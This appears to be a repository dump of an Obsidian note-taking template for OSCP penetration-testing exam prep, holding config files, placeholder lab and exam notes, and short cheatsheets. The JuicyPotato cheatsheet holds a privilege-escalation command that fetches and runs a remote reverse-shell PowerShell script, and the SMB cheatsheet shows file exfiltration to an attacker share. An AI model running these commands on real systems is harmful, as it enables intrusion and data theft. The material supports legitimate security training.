├── .obsidian ├── app.json ├── appearance.json ├── core-plugins-migration.json ├── core-plugins.json ├── graph.json ├── hotkeys.json ├── workspace ├── workspace.json └── workspaces.json ├── Attachments ├── Pasted image 20210418203944.png ├── Pasted image 20210813173305.png ├── Pasted image 20210813180944.png └── Pasted image 20230324145839.png ├── Cheatsheets ├── Common Exploits │ └── Potato Exploits.md ├── Common Tools │ └── Git Dumper.md ├── Privilege Escalation - Windows │ └── File Transfer - SMB Server.md └── Useful Commands - Linux │ └── Find Writeable Directories.md ├── Course Notes ├── Chapter X - Title.md ├── Chapter Y - Title.md └── Course Notes Index.md ├── Exam ├── AD Set │ ├── AD Set Domain Index.md │ ├── Active Directory Set.canvas │ ├── Client 1 │ │ ├── 00 - Overview.md │ │ ├── 10 - Client-Side Attack.md │ │ └── Exam Client 1 Index.md │ ├── Client 2 │ │ ├── 00 - Overview.md │ │ └── Exam Client 2 Index.md │ ├── Domain Controller │ │ ├── 00 - Overview.md │ │ └── Exam DC Index.md │ └── Password Spray (example.corp).md ├── Exam Index.md ├── Independent Machine 1 │ ├── 00 - Overview.md │ └── Exam Machine 1 Index.md ├── Independent Machine 2 │ ├── 00 - Overview.md │ └── Exam Machine 2 Index.md └── Independent Machine 3 │ ├── 00 - Overview.md │ └── Exam Machine 3 Index.md ├── Labs ├── 10.0.0.1 (Andy) │ ├── 00 - Overview.md │ ├── 05 - Enumeration.md │ ├── 10 - Website.md │ ├── 15 - Shell as Andy.md │ ├── 16 - Potential Local Exploits.md │ ├── 20 - Post Exploitation.md │ └── Andy Index.md ├── 10.0.0.2 │ ├── 00 - Overview.md │ ├── 05 - Enumeration.md │ └── 10.0.0.2 Index.md ├── 10.1.0.1 (Sandy) │ ├── 00 - Overview.md │ ├── 05 - Enumeration.md │ └── Sandy Index.md ├── Lab Loot.md ├── Labs Index.md ├── Lessons Learned.md ├── Live Hosts.md └── Network Scans.md ├── README.md └── Resources ├── Communities.md ├── Cybersecurity Notes.md ├── Exam Details.md ├── Exam Tips.md ├── Report Templates.md └── Tools.md /.obsidian/app.json: -------------------------------------------------------------------------------- 1 | { 2 | "attachmentFolderPath": "Attachments", 3 | "pdfExportSettings": { 4 | "pageSize": "Letter", 5 | "landscape": false, 6 | "margin": "0", 7 | "downscalePercent": 100 8 | } 9 | } -------------------------------------------------------------------------------- /.obsidian/appearance.json: -------------------------------------------------------------------------------- 1 | { 2 | "baseFontSize": 16, 3 | "accentColor": "" 4 | } -------------------------------------------------------------------------------- /.obsidian/core-plugins-migration.json: -------------------------------------------------------------------------------- 1 | { 2 | "file-explorer": true, 3 | "global-search": true, 4 | "switcher": true, 5 | "graph": true, 6 | "backlink": true, 7 | "outgoing-link": false, 8 | "tag-pane": false, 9 | "page-preview": true, 10 | "daily-notes": false, 11 | "templates": false, 12 | "note-composer": true, 13 | "command-palette": true, 14 | "slash-command": false, 15 | "editor-status": false, 16 | "starred": false, 17 | "markdown-importer": true, 18 | "zk-prefixer": false, 19 | "random-note": false, 20 | "outline": true, 21 | "word-count": true, 22 | "slides": false, 23 | "audio-recorder": false, 24 | "workspaces": true, 25 | "file-recovery": true, 26 | "publish": false, 27 | "sync": false, 28 | "canvas": true 29 | } -------------------------------------------------------------------------------- /.obsidian/core-plugins.json: -------------------------------------------------------------------------------- 1 | [ 2 | "file-explorer", 3 | "global-search", 4 | "switcher", 5 | "graph", 6 | "backlink", 7 | "canvas", 8 | "page-preview", 9 | "note-composer", 10 | "command-palette", 11 | "markdown-importer", 12 | "outline", 13 | "word-count", 14 | "workspaces", 15 | "file-recovery" 16 | ] -------------------------------------------------------------------------------- /.obsidian/graph.json: -------------------------------------------------------------------------------- 1 | { 2 | "collapse-filter": true, 3 | "search": "", 4 | "showTags": false, 5 | "showAttachments": false, 6 | "hideUnresolved": false, 7 | "showOrphans": true, 8 | "collapse-color-groups": true, 9 | "colorGroups": [], 10 | "collapse-display": true, 11 | "showArrow": false, 12 | "textFadeMultiplier": 0, 13 | "nodeSizeMultiplier": 1, 14 | "lineSizeMultiplier": 1, 15 | "collapse-forces": true, 16 | "centerStrength": 0.518713248970312, 17 | "repelStrength": 10, 18 | "linkStrength": 1, 19 | "linkDistance": 250, 20 | "scale": 0.7192927393119641, 21 | "close": false 22 | } -------------------------------------------------------------------------------- /.obsidian/hotkeys.json: -------------------------------------------------------------------------------- 1 | { 2 | "editor:cycle-list-checklist": [ 3 | { 4 | "modifiers": [ 5 | "Mod" 6 | ], 7 | "key": "Enter" 8 | } 9 | ], 10 | "editor:open-link-in-new-leaf": [ 11 | { 12 | "modifiers": [ 13 | "Mod", 14 | "Shift" 15 | ], 16 | "key": "Enter" 17 | } 18 | ] 19 | } -------------------------------------------------------------------------------- /.obsidian/workspace: -------------------------------------------------------------------------------- 1 | { 2 | "main": { 3 | "id": "0a4681d1bd0f3ccd", 4 | "type": "split", 5 | "children": [ 6 | { 7 | "id": "3d7d6acb4e46f794", 8 | "type": "leaf", 9 | "state": { 10 | "type": "graph", 11 | "state": {} 12 | } 13 | } 14 | ], 15 | "direction": "vertical" 16 | }, 17 | "left": { 18 | "id": "def75e95f6b85e9f", 19 | "type": "split", 20 | "children": [ 21 | { 22 | "id": "48964a4f8b13207c", 23 | "type": "tabs", 24 | "children": [ 25 | { 26 | "id": "45c4f1d872e58605", 27 | "type": "leaf", 28 | "state": { 29 | "type": "file-explorer", 30 | "state": {} 31 | } 32 | }, 33 | { 34 | "id": "df395571c07f867d", 35 | "type": "leaf", 36 | "state": { 37 | "type": "search", 38 | "state": { 39 | "query": "enumeration", 40 | "matchingCase": false, 41 | "explainSearch": false, 42 | "collapseAll": false, 43 | "extraContext": false, 44 | "sortOrder": "alphabetical" 45 | } 46 | } 47 | } 48 | ] 49 | } 50 | ], 51 | "direction": "horizontal", 52 | "width": 300 53 | }, 54 | "right": { 55 | "id": "43f2b1dd61471c59", 56 | "type": "split", 57 | "children": [ 58 | { 59 | "id": "baacf29172e998d7", 60 | "type": "tabs", 61 | "children": [ 62 | { 63 | "id": "7209f9740a382644", 64 | "type": "leaf", 65 | "state": { 66 | "type": "backlink", 67 | "state": { 68 | "collapseAll": false, 69 | "extraContext": false, 70 | "sortOrder": "alphabetical", 71 | "showSearch": false, 72 | "searchQuery": "", 73 | "backlinkCollapsed": false, 74 | "unlinkedCollapsed": true 75 | } 76 | } 77 | }, 78 | { 79 | "id": "bebc0463f0feae2b", 80 | "type": "leaf", 81 | "state": { 82 | "type": "outline", 83 | "state": {} 84 | } 85 | } 86 | ] 87 | } 88 | ], 89 | "direction": "horizontal", 90 | "width": 300, 91 | "collapsed": true 92 | }, 93 | "active": "3d7d6acb4e46f794", 94 | "lastOpenFiles": [ 95 | "README.md", 96 | "Resources/Tools.md", 97 | "Resources/Report Templates.md", 98 | "Resources/Exam Tips.md", 99 | "Resources/Exam Details.md", 100 | "Resources/Cybersecurity Notes.md", 101 | "Resources/Communities.md", 102 | "Labs/Network Scans.md", 103 | "Labs/Live Hosts.md", 104 | "Labs/Lessons Learned.md" 105 | ] 106 | } -------------------------------------------------------------------------------- /.obsidian/workspace.json: -------------------------------------------------------------------------------- 1 | { 2 | "main": { 3 | "id": "0a4681d1bd0f3ccd", 4 | "type": "split", 5 | "children": [ 6 | { 7 | "id": "2e2067be550c900f", 8 | "type": "tabs", 9 | "children": [ 10 | { 11 | "id": "e6c1f0bfd59e7b9d", 12 | "type": "leaf", 13 | "state": { 14 | "type": "markdown", 15 | "state": { 16 | "file": "README.md", 17 | "mode": "preview", 18 | "source": false 19 | } 20 | } 21 | }, 22 | { 23 | "id": "e75609a1db549e0b", 24 | "type": "leaf", 25 | "state": { 26 | "type": "graph", 27 | "state": {} 28 | } 29 | } 30 | ] 31 | } 32 | ], 33 | "direction": "vertical" 34 | }, 35 | "left": { 36 | "id": "def75e95f6b85e9f", 37 | "type": "split", 38 | "children": [ 39 | { 40 | "id": "48964a4f8b13207c", 41 | "type": "tabs", 42 | "children": [ 43 | { 44 | "id": "45c4f1d872e58605", 45 | "type": "leaf", 46 | "state": { 47 | "type": "file-explorer", 48 | "state": { 49 | "sortOrder": "alphabetical" 50 | } 51 | } 52 | }, 53 | { 54 | "id": "df395571c07f867d", 55 | "type": "leaf", 56 | "state": { 57 | "type": "search", 58 | "state": { 59 | "query": "enumeration", 60 | "matchingCase": false, 61 | "explainSearch": false, 62 | "collapseAll": false, 63 | "extraContext": false, 64 | "sortOrder": "alphabetical" 65 | } 66 | } 67 | } 68 | ] 69 | } 70 | ], 71 | "direction": "horizontal", 72 | "width": 300, 73 | "collapsed": true 74 | }, 75 | "right": { 76 | "id": "43f2b1dd61471c59", 77 | "type": "split", 78 | "children": [ 79 | { 80 | "id": "baacf29172e998d7", 81 | "type": "tabs", 82 | "children": [ 83 | { 84 | "id": "7209f9740a382644", 85 | "type": "leaf", 86 | "state": { 87 | "type": "backlink", 88 | "state": { 89 | "file": "README.md", 90 | "collapseAll": false, 91 | "extraContext": false, 92 | "sortOrder": "alphabetical", 93 | "showSearch": false, 94 | "searchQuery": "", 95 | "backlinkCollapsed": false, 96 | "unlinkedCollapsed": true 97 | } 98 | } 99 | }, 100 | { 101 | "id": "bebc0463f0feae2b", 102 | "type": "leaf", 103 | "state": { 104 | "type": "outline", 105 | "state": { 106 | "file": "README.md" 107 | } 108 | } 109 | } 110 | ], 111 | "currentTab": 1 112 | } 113 | ], 114 | "direction": "horizontal", 115 | "width": 300, 116 | "collapsed": true 117 | }, 118 | "left-ribbon": { 119 | "hiddenItems": { 120 | "switcher:Open quick switcher": false, 121 | "graph:Open graph view": false, 122 | "canvas:Create new canvas": false, 123 | "command-palette:Open command palette": false, 124 | "markdown-importer:Open format converter": false, 125 | "workspaces:Manage workspace layouts": false 126 | } 127 | }, 128 | "active": "e6c1f0bfd59e7b9d", 129 | "lastOpenFiles": [ 130 | "Exam/Exam Index.md", 131 | "Exam/AD Set/AD Set Domain Index.md", 132 | "README.md", 133 | "Labs/Lessons Learned.md", 134 | "Resources/Tools.md", 135 | "Resources/Report Templates.md", 136 | "Resources/Exam Tips.md", 137 | "Resources/Exam Details.md", 138 | "Resources/Cybersecurity Notes.md", 139 | "Resources/Communities.md", 140 | "Labs/Network Scans.md", 141 | "Labs/Live Hosts.md", 142 | "Labs/Labs Index.md", 143 | "Labs/Lab Loot.md", 144 | "Labs/10.1.0.1 (Sandy)/Sandy Index.md", 145 | "Labs/10.1.0.1 (Sandy)/05 - Enumeration.md", 146 | "Labs/10.1.0.1 (Sandy)/00 - Overview.md", 147 | "Labs/10.0.0.2/10.0.0.2 Index.md", 148 | "Labs/10.0.0.2/05 - Enumeration.md", 149 | "Labs/10.0.0.2/00 - Overview.md", 150 | "Labs/10.0.0.1 (Andy)/Andy Index.md", 151 | "Labs/10.0.0.1 (Andy)/20 - Post Exploitation.md", 152 | "Labs/10.0.0.1 (Andy)/16 - Potential Local Exploits.md", 153 | "Labs/10.0.0.1 (Andy)/15 - Shell as Andy.md", 154 | "Labs/10.0.0.1 (Andy)/10 - Website.md", 155 | "Labs/10.0.0.1 (Andy)/05 - Enumeration.md", 156 | "Exam/AD Set/Active Directory Set.canvas", 157 | "Exam/AD Set/Client 2", 158 | "Exam/AD Set/Client 1", 159 | "Exam/AD Set/Domain Controller", 160 | "Exam/Independent Machine 3", 161 | "Exam/Independent Machine 2", 162 | "Exam/Independent Machine 1", 163 | "Exam/AD Set" 164 | ] 165 | } -------------------------------------------------------------------------------- /.obsidian/workspaces.json: -------------------------------------------------------------------------------- 1 | { 2 | "workspaces": { 3 | "Exam": { 4 | "main": { 5 | "id": "0a4681d1bd0f3ccd", 6 | "type": "split", 7 | "children": [ 8 | { 9 | "id": "2e2067be550c900f", 10 | "type": "tabs", 11 | "children": [ 12 | { 13 | "id": "e6c1f0bfd59e7b9d", 14 | "type": "leaf", 15 | "state": { 16 | "type": "markdown", 17 | "state": { 18 | "file": "Exam/Exam Index.md", 19 | "mode": "source", 20 | "source": false 21 | } 22 | } 23 | }, 24 | { 25 | "id": "d46eb58c16340752", 26 | "type": "leaf", 27 | "state": { 28 | "type": "canvas", 29 | "state": { 30 | "file": "Exam/AD Set/Active Directory Set.canvas", 31 | "viewState": { 32 | "x": -60, 33 | "y": 170, 34 | "zoom": -0.6602785096924807 35 | } 36 | } 37 | } 38 | } 39 | ] 40 | } 41 | ], 42 | "direction": "vertical" 43 | }, 44 | "left": { 45 | "id": "def75e95f6b85e9f", 46 | "type": "split", 47 | "children": [ 48 | { 49 | "id": "48964a4f8b13207c", 50 | "type": "tabs", 51 | "children": [ 52 | { 53 | "id": "45c4f1d872e58605", 54 | "type": "leaf", 55 | "state": { 56 | "type": "file-explorer", 57 | "state": { 58 | "sortOrder": "alphabetical" 59 | } 60 | } 61 | }, 62 | { 63 | "id": "df395571c07f867d", 64 | "type": "leaf", 65 | "state": { 66 | "type": "search", 67 | "state": { 68 | "query": "enumeration", 69 | "matchingCase": false, 70 | "explainSearch": false, 71 | "collapseAll": false, 72 | "extraContext": false, 73 | "sortOrder": "alphabetical" 74 | } 75 | } 76 | } 77 | ] 78 | } 79 | ], 80 | "direction": "horizontal", 81 | "width": 300, 82 | "collapsed": true 83 | }, 84 | "right": { 85 | "id": "43f2b1dd61471c59", 86 | "type": "split", 87 | "children": [ 88 | { 89 | "id": "baacf29172e998d7", 90 | "type": "tabs", 91 | "children": [ 92 | { 93 | "id": "7209f9740a382644", 94 | "type": "leaf", 95 | "state": { 96 | "type": "backlink", 97 | "state": { 98 | "file": "Exam/Exam Index.md", 99 | "collapseAll": false, 100 | "extraContext": false, 101 | "sortOrder": "alphabetical", 102 | "showSearch": false, 103 | "searchQuery": "", 104 | "backlinkCollapsed": false, 105 | "unlinkedCollapsed": true 106 | } 107 | } 108 | }, 109 | { 110 | "id": "bebc0463f0feae2b", 111 | "type": "leaf", 112 | "state": { 113 | "type": "outline", 114 | "state": { 115 | "file": "Exam/Exam Index.md" 116 | } 117 | } 118 | } 119 | ] 120 | } 121 | ], 122 | "direction": "horizontal", 123 | "width": 300, 124 | "collapsed": true 125 | }, 126 | "left-ribbon": { 127 | "hiddenItems": { 128 | "switcher:Open quick switcher": false, 129 | "graph:Open graph view": false, 130 | "canvas:Create new canvas": false, 131 | "command-palette:Open command palette": false, 132 | "markdown-importer:Open format converter": false, 133 | "workspaces:Manage workspace layouts": false 134 | } 135 | }, 136 | "active": "45c4f1d872e58605" 137 | }, 138 | "Labs": { 139 | "main": { 140 | "id": "0a4681d1bd0f3ccd", 141 | "type": "split", 142 | "children": [ 143 | { 144 | "id": "86c4aff70f677f79", 145 | "type": "tabs", 146 | "children": [ 147 | { 148 | "id": "646461a817ee0222", 149 | "type": "leaf", 150 | "state": { 151 | "type": "markdown", 152 | "state": { 153 | "file": "Labs/Labs Index.md", 154 | "mode": "source", 155 | "source": false 156 | } 157 | } 158 | }, 159 | { 160 | "id": "993507b08487f1ed", 161 | "type": "leaf", 162 | "state": { 163 | "type": "markdown", 164 | "state": { 165 | "file": "Labs/Lessons Learned.md", 166 | "mode": "source", 167 | "source": false 168 | } 169 | } 170 | }, 171 | { 172 | "id": "662ec8cfb1461956", 173 | "type": "leaf", 174 | "state": { 175 | "type": "markdown", 176 | "state": { 177 | "file": "Labs/Live Hosts.md", 178 | "mode": "source", 179 | "source": false 180 | } 181 | } 182 | }, 183 | { 184 | "id": "5e45acc4eed54f5f", 185 | "type": "leaf", 186 | "state": { 187 | "type": "markdown", 188 | "state": { 189 | "file": "Labs/Network Scans.md", 190 | "mode": "source", 191 | "source": false 192 | } 193 | } 194 | }, 195 | { 196 | "id": "f788e8dd21a5de5d", 197 | "type": "leaf", 198 | "state": { 199 | "type": "markdown", 200 | "state": { 201 | "file": "Labs/Lab Loot.md", 202 | "mode": "source", 203 | "source": false 204 | } 205 | } 206 | } 207 | ] 208 | } 209 | ], 210 | "direction": "vertical" 211 | }, 212 | "left": { 213 | "id": "def75e95f6b85e9f", 214 | "type": "split", 215 | "children": [ 216 | { 217 | "id": "48964a4f8b13207c", 218 | "type": "tabs", 219 | "children": [ 220 | { 221 | "id": "45c4f1d872e58605", 222 | "type": "leaf", 223 | "state": { 224 | "type": "file-explorer", 225 | "state": { 226 | "sortOrder": "alphabetical" 227 | } 228 | } 229 | }, 230 | { 231 | "id": "df395571c07f867d", 232 | "type": "leaf", 233 | "state": { 234 | "type": "search", 235 | "state": { 236 | "query": "enumeration", 237 | "matchingCase": false, 238 | "explainSearch": false, 239 | "collapseAll": false, 240 | "extraContext": false, 241 | "sortOrder": "alphabetical" 242 | } 243 | } 244 | } 245 | ] 246 | } 247 | ], 248 | "direction": "horizontal", 249 | "width": 300, 250 | "collapsed": true 251 | }, 252 | "right": { 253 | "id": "43f2b1dd61471c59", 254 | "type": "split", 255 | "children": [ 256 | { 257 | "id": "baacf29172e998d7", 258 | "type": "tabs", 259 | "children": [ 260 | { 261 | "id": "7209f9740a382644", 262 | "type": "leaf", 263 | "state": { 264 | "type": "backlink", 265 | "state": { 266 | "file": "Labs/Labs Index.md", 267 | "collapseAll": false, 268 | "extraContext": false, 269 | "sortOrder": "alphabetical", 270 | "showSearch": false, 271 | "searchQuery": "", 272 | "backlinkCollapsed": false, 273 | "unlinkedCollapsed": true 274 | } 275 | } 276 | }, 277 | { 278 | "id": "bebc0463f0feae2b", 279 | "type": "leaf", 280 | "state": { 281 | "type": "outline", 282 | "state": { 283 | "file": "Labs/Labs Index.md" 284 | } 285 | } 286 | } 287 | ] 288 | } 289 | ], 290 | "direction": "horizontal", 291 | "width": 300, 292 | "collapsed": true 293 | }, 294 | "left-ribbon": { 295 | "hiddenItems": { 296 | "switcher:Open quick switcher": false, 297 | "graph:Open graph view": false, 298 | "canvas:Create new canvas": false, 299 | "command-palette:Open command palette": false, 300 | "markdown-importer:Open format converter": false, 301 | "workspaces:Manage workspace layouts": false 302 | } 303 | }, 304 | "active": "646461a817ee0222" 305 | }, 306 | "Home": { 307 | "main": { 308 | "id": "0a4681d1bd0f3ccd", 309 | "type": "split", 310 | "children": [ 311 | { 312 | "id": "2e2067be550c900f", 313 | "type": "tabs", 314 | "children": [ 315 | { 316 | "id": "e6c1f0bfd59e7b9d", 317 | "type": "leaf", 318 | "state": { 319 | "type": "markdown", 320 | "state": { 321 | "file": "README.md", 322 | "mode": "preview", 323 | "source": false 324 | } 325 | } 326 | }, 327 | { 328 | "id": "5dc24bc89673c7e7", 329 | "type": "leaf", 330 | "state": { 331 | "type": "graph", 332 | "state": {} 333 | } 334 | } 335 | ] 336 | } 337 | ], 338 | "direction": "vertical" 339 | }, 340 | "left": { 341 | "id": "def75e95f6b85e9f", 342 | "type": "split", 343 | "children": [ 344 | { 345 | "id": "48964a4f8b13207c", 346 | "type": "tabs", 347 | "children": [ 348 | { 349 | "id": "45c4f1d872e58605", 350 | "type": "leaf", 351 | "state": { 352 | "type": "file-explorer", 353 | "state": { 354 | "sortOrder": "alphabetical" 355 | } 356 | } 357 | }, 358 | { 359 | "id": "df395571c07f867d", 360 | "type": "leaf", 361 | "state": { 362 | "type": "search", 363 | "state": { 364 | "query": "enumeration", 365 | "matchingCase": false, 366 | "explainSearch": false, 367 | "collapseAll": false, 368 | "extraContext": false, 369 | "sortOrder": "alphabetical" 370 | } 371 | } 372 | } 373 | ] 374 | } 375 | ], 376 | "direction": "horizontal", 377 | "width": 300, 378 | "collapsed": true 379 | }, 380 | "right": { 381 | "id": "43f2b1dd61471c59", 382 | "type": "split", 383 | "children": [ 384 | { 385 | "id": "baacf29172e998d7", 386 | "type": "tabs", 387 | "children": [ 388 | { 389 | "id": "7209f9740a382644", 390 | "type": "leaf", 391 | "state": { 392 | "type": "backlink", 393 | "state": { 394 | "file": "README.md", 395 | "collapseAll": false, 396 | "extraContext": false, 397 | "sortOrder": "alphabetical", 398 | "showSearch": false, 399 | "searchQuery": "", 400 | "backlinkCollapsed": false, 401 | "unlinkedCollapsed": true 402 | } 403 | } 404 | }, 405 | { 406 | "id": "bebc0463f0feae2b", 407 | "type": "leaf", 408 | "state": { 409 | "type": "outline", 410 | "state": { 411 | "file": "README.md" 412 | } 413 | } 414 | } 415 | ], 416 | "currentTab": 1 417 | } 418 | ], 419 | "direction": "horizontal", 420 | "width": 300, 421 | "collapsed": true 422 | }, 423 | "left-ribbon": { 424 | "hiddenItems": { 425 | "switcher:Open quick switcher": false, 426 | "graph:Open graph view": false, 427 | "canvas:Create new canvas": false, 428 | "command-palette:Open command palette": false, 429 | "markdown-importer:Open format converter": false, 430 | "workspaces:Manage workspace layouts": false 431 | } 432 | }, 433 | "active": "e6c1f0bfd59e7b9d" 434 | } 435 | }, 436 | "active": "Home" 437 | } -------------------------------------------------------------------------------- /Attachments/Pasted image 20210418203944.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Twigonometry/OSCP-Notes-Template/885996b9ca65b1dab505c3162a54b251e8c5e521/Attachments/Pasted image 20210418203944.png -------------------------------------------------------------------------------- /Attachments/Pasted image 20210813173305.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Twigonometry/OSCP-Notes-Template/885996b9ca65b1dab505c3162a54b251e8c5e521/Attachments/Pasted image 20210813173305.png -------------------------------------------------------------------------------- /Attachments/Pasted image 20210813180944.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Twigonometry/OSCP-Notes-Template/885996b9ca65b1dab505c3162a54b251e8c5e521/Attachments/Pasted image 20210813180944.png -------------------------------------------------------------------------------- /Attachments/Pasted image 20230324145839.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Twigonometry/OSCP-Notes-Template/885996b9ca65b1dab505c3162a54b251e8c5e521/Attachments/Pasted image 20230324145839.png -------------------------------------------------------------------------------- /Cheatsheets/Common Exploits/Potato Exploits.md: -------------------------------------------------------------------------------- 1 | ## Required Privileges 2 | 3 | - `SeImpersonatePrivilege` OR 4 | - `SeAssignPrimaryTokenPrivilege` 5 | 6 | ## Juicy Potato 7 | 8 | Repo: [https://github.com/ohpe/juicy-potato](https://github.com/ohpe/juicy-potato) 9 | 10 | List of CLSIDs: 11 | - [https://github.com/ohpe/juicy-potato/tree/master/CLSID](https://github.com/ohpe/juicy-potato/tree/master/CLSID) 12 | - Mirror: [http://ohpe.it/juicy-potato/CLSID/](http://ohpe.it/juicy-potato/CLSID/) 13 | 14 | ### Usage 15 | 16 | #### 64-bit 17 | 18 | ```cmd 19 | c:> JuicyPotatox86.exe -l 1337 -p c:\windows\system32\cmd.exe -a "/c powershell -ep bypass iex (New-Object Net.WebClient).DownloadString('http://192.168.119.130:8080/minirev.ps1')" -t * -c {03ca98d6-ff5d-49b8-abc6-03dd84127020} 20 | ``` -------------------------------------------------------------------------------- /Cheatsheets/Common Tools/Git Dumper.md: -------------------------------------------------------------------------------- 1 | ## Basic Usage 2 | 3 | ```bash 4 | $ /opt/git-dumper/git-dumper.py [TARGET_SITE]/.git [OUTPUT_DIRECTORY] 5 | ``` -------------------------------------------------------------------------------- /Cheatsheets/Privilege Escalation - Windows/File Transfer - SMB Server.md: -------------------------------------------------------------------------------- 1 | # File Transfer with SMB Server 2 | 3 | ## Simple SMB Server 4 | 5 | With `impacket-smbserver`: 6 | 7 | ``` 8 | sudo impacket-smbserver [SHARE_NAME] [PATH_TO_SHARE] 9 | ``` 10 | 11 | E.g. to server current directory: 12 | 13 | ``` 14 | sudo impacket-smbserver share . 15 | ``` 16 | 17 | To copy from the share to a Windows client: 18 | 19 | ``` 20 | copy \\[IP]\share\file 21 | ``` 22 | 23 | To copy to the share (i.e. exfiltrate a file): 24 | 25 | ``` 26 | copy [FILE] \\[IP]\share 27 | ``` 28 | 29 | ## SMB 2 With Password 30 | 31 | If you receive this message when connecting to an SMB server: 32 | 33 | ``` 34 | You can't connect to the file share because it's not secure. This share requires the obsolete SMB1 protocol, which is unsafe and could expose your system to attack. 35 | Your system requires SMB2 or higher. For more info on resolving this issue, see: https://go.microsoft.com/fwlink/?linkid=852747 36 | ``` 37 | 38 | You can start an SMB server in SMB 2.0 mode with a password: 39 | 40 | ``` 41 | $ impacket-smbserver share . -smb2support -username test -password test 42 | ``` 43 | 44 | To connect to the share, run: 45 | 46 | ``` 47 | net use z: \\[IP]\share /u:test test 48 | ``` 49 | 50 | Download/upload as normal: 51 | 52 | ``` 53 | copy file \\[IP]\share 54 | ``` -------------------------------------------------------------------------------- /Cheatsheets/Useful Commands - Linux/Find Writeable Directories.md: -------------------------------------------------------------------------------- 1 | ``` 2 | find / -writable -type d 2>/dev/null # world-writeable folders 3 | find / -perm -222 -type d 2>/dev/null # world-writeable folders 4 | find / -perm -o w -type d 2>/dev/null # world-writeable folders 5 | ``` -------------------------------------------------------------------------------- /Course Notes/Chapter X - Title.md: -------------------------------------------------------------------------------- 1 | ## Section 1 2 | 3 | ### Subsection 1.1 4 | 5 | ## Section 2 6 | 7 | ## Section 3 8 | 9 | ## Exercises To-Do 10 | 11 | - [x] 1.1.1 (page 10) 12 | - [ ] 1.1.2 (page 12) -------------------------------------------------------------------------------- /Course Notes/Chapter Y - Title.md: -------------------------------------------------------------------------------- 1 | ## Section 1 2 | 3 | ## Section 2 4 | 5 | ## Exercises To-Do 6 | 7 | - [ ] 2.1.1 (page 20) -------------------------------------------------------------------------------- /Course Notes/Course Notes Index.md: -------------------------------------------------------------------------------- 1 | This folder contains the notes I've made on each chapter of the course material. 2 | 3 | ## Chapters 4 | 5 | Chapter X Notes: [[Chapter X - Title]] 6 | 7 | Chapter Y Notes: [[Chapter Y - Title]] 8 | 9 | ## To-Do 10 | 11 | - [x] Chapter X 12 | - [x] Chapter Y 13 | - [ ] Chapter Z -------------------------------------------------------------------------------- /Exam/AD Set/AD Set Domain Index.md: -------------------------------------------------------------------------------- 1 | Domain Name: example.corp 2 | 3 | Machines: 4 | - Domain Controller: [[Exam DC Index]] 5 | - Client 1: [[Exam Client 1 Index]] 6 | - Client 2: [[Exam Client 2 Index]] 7 | 8 | ## Attack Overview 9 | 10 | This set involves a client-side attack on [[Exam Client 1 Index|Client 1]] and... 11 | 12 | ## Domain-Wide Attacks and Enumeration 13 | 14 | Store links to notes on non-client specific attacks here e.g. scanning of the full network/password spraying 15 | 16 | Password Spraying: [[Password Spray (example.corp)]] -------------------------------------------------------------------------------- /Exam/AD Set/Active Directory Set.canvas: -------------------------------------------------------------------------------- 1 | { 2 | "nodes":[ 3 | {"id":"078c52b2510d2610","x":-260,"y":-460,"width":400,"height":400,"type":"file","file":"Exam/AD Set/AD Set Domain Index.md"}, 4 | {"id":"7dbbd7daef43d049","x":-740,"y":140,"width":400,"height":400,"type":"file","file":"Exam/AD Set/Domain Controller/Exam DC Index.md"}, 5 | {"id":"6c134f90e268b745","x":220,"y":140,"width":400,"height":400,"type":"file","file":"Exam/Independent Machine 1/Exam Machine 1 Index.md"}, 6 | {"id":"b292f3d377778c1b","x":-260,"y":140,"width":400,"height":400,"type":"file","file":"Exam/Independent Machine 2/Exam Machine 2 Index.md"}, 7 | {"id":"54de32064c482631","x":288,"y":720,"width":265,"height":80,"type":"text","text":"Compromise via client-side attack"}, 8 | {"id":"aee10bc68d6c182d","x":-185,"y":730,"width":250,"height":60,"type":"text","text":"Pivot with creds"} 9 | ], 10 | "edges":[ 11 | {"id":"b086030cf5b48ec1","fromNode":"54de32064c482631","fromSide":"top","toNode":"6c134f90e268b745","toSide":"bottom"}, 12 | {"id":"a3633ad5c6b0952f","fromNode":"54de32064c482631","fromSide":"left","toNode":"aee10bc68d6c182d","toSide":"right"}, 13 | {"id":"7aec2d392dbcf08f","fromNode":"aee10bc68d6c182d","fromSide":"top","toNode":"b292f3d377778c1b","toSide":"bottom"}, 14 | {"id":"be6a69407befc7f2","fromNode":"aee10bc68d6c182d","fromSide":"left","toNode":"7dbbd7daef43d049","toSide":"bottom"} 15 | ] 16 | } -------------------------------------------------------------------------------- /Exam/AD Set/Client 1/00 - Overview.md: -------------------------------------------------------------------------------- 1 | # AD Set Client 1 Overview 2 | 3 | Machine Details: 4 | 5 | |IP|Hostname|Operating System| 6 | |---|---|---| 7 | |10.0.11.2|client1.example.corp|Windows 10| -------------------------------------------------------------------------------- /Exam/AD Set/Client 1/10 - Client-Side Attack.md: -------------------------------------------------------------------------------- 1 | I performed a client-side attack to gain a foothold in the network... -------------------------------------------------------------------------------- /Exam/AD Set/Client 1/Exam Client 1 Index.md: -------------------------------------------------------------------------------- 1 | Overview: [[Exam/AD Set/Client 1/00 - Overview]] 2 | 3 | Client-Side Attack: [[10 - Client-Side Attack]] -------------------------------------------------------------------------------- /Exam/AD Set/Client 2/00 - Overview.md: -------------------------------------------------------------------------------- 1 | # AD Set Client 2 Overview 2 | 3 | Machine Details: 4 | 5 | |IP|Hostname|Operating System| 6 | |---|---|---| 7 | |10.0.11.3|client2.example.corp|Windows 10| -------------------------------------------------------------------------------- /Exam/AD Set/Client 2/Exam Client 2 Index.md: -------------------------------------------------------------------------------- 1 | Overview: [[Exam/AD Set/Client 2/00 - Overview]] -------------------------------------------------------------------------------- /Exam/AD Set/Domain Controller/00 - Overview.md: -------------------------------------------------------------------------------- 1 | Machine Details: 2 | 3 | |IP|Hostname|Operating System| 4 | |---|---|---| 5 | |10.0.11.2|DC.example.corp|Windows Server 2019| -------------------------------------------------------------------------------- /Exam/AD Set/Domain Controller/Exam DC Index.md: -------------------------------------------------------------------------------- 1 | Overview: [[Exam/AD Set/Domain Controller/00 - Overview]] -------------------------------------------------------------------------------- /Exam/AD Set/Password Spray (example.corp).md: -------------------------------------------------------------------------------- 1 | I ran this command to spray found credentials across the domain: 2 | 3 | ```bash 4 | $ 5 | ``` -------------------------------------------------------------------------------- /Exam/Exam Index.md: -------------------------------------------------------------------------------- 1 | You do not need to flesh this note out in your exam, 